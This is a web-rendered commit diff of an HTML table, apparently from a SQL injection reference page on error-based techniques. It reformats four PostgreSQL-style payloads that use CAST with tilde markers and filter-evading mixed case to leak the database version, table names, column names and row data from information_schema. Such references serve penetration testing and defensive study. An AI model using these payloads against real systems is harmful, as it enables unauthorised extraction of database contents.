File tree Expand file tree Collapse file tree 1 file changed +7
-7
lines changed
injectionTypes/errorBased Expand file tree Collapse file tree 1 file changed +7
-7
lines changed Original file line number Diff line number Diff line change @@ -5,21 +5,21 @@ <h3 id="error-based">Error Based</h3>
55< table class ="table table-striped table-hover ">
66 < thead >
77 < tr >
8- < th > Description</ th >
98 < th align ="left "> Query</ th >
109 </ tr >
1110 </ thead >
1211 < tbody >
13- < tr >
14- < td > Explicit conversion</ td >
12+ < tr >
1513 < td > ,cAsT(chr(126)||vErSiOn()||chr(126)+aS+nUmeRiC)</ td >
14+ </ tr >
15+ < tr >
1616 < td > ,cAsT(chr(126)||(sEleCt+table_name+fRoM+information_schema.tables+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--</ td >
17+ </ tr >
18+ < tr >
1719 < td > ,cAsT(chr(126)||(sEleCt+column_name+fRoM+information_schema.columns+wHerE+table_name=data_column+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)--</ td >
20+ </ tr >
21+ < tr >
1822 < td > ,cAsT(chr(126)||(sEleCt+data_column+fRoM+data_table+lImIt+1+offset+data_offset)||chr(126)+as+nUmeRiC)</ td >
1923 </ tr >
20- < tr >
21- < td > Implicit conversion</ td >
22- < td > TBD</ td >
23- </ tr >
2424 </ tbody >
2525</ table >
You can’t perform that action at this time.
0 commit comments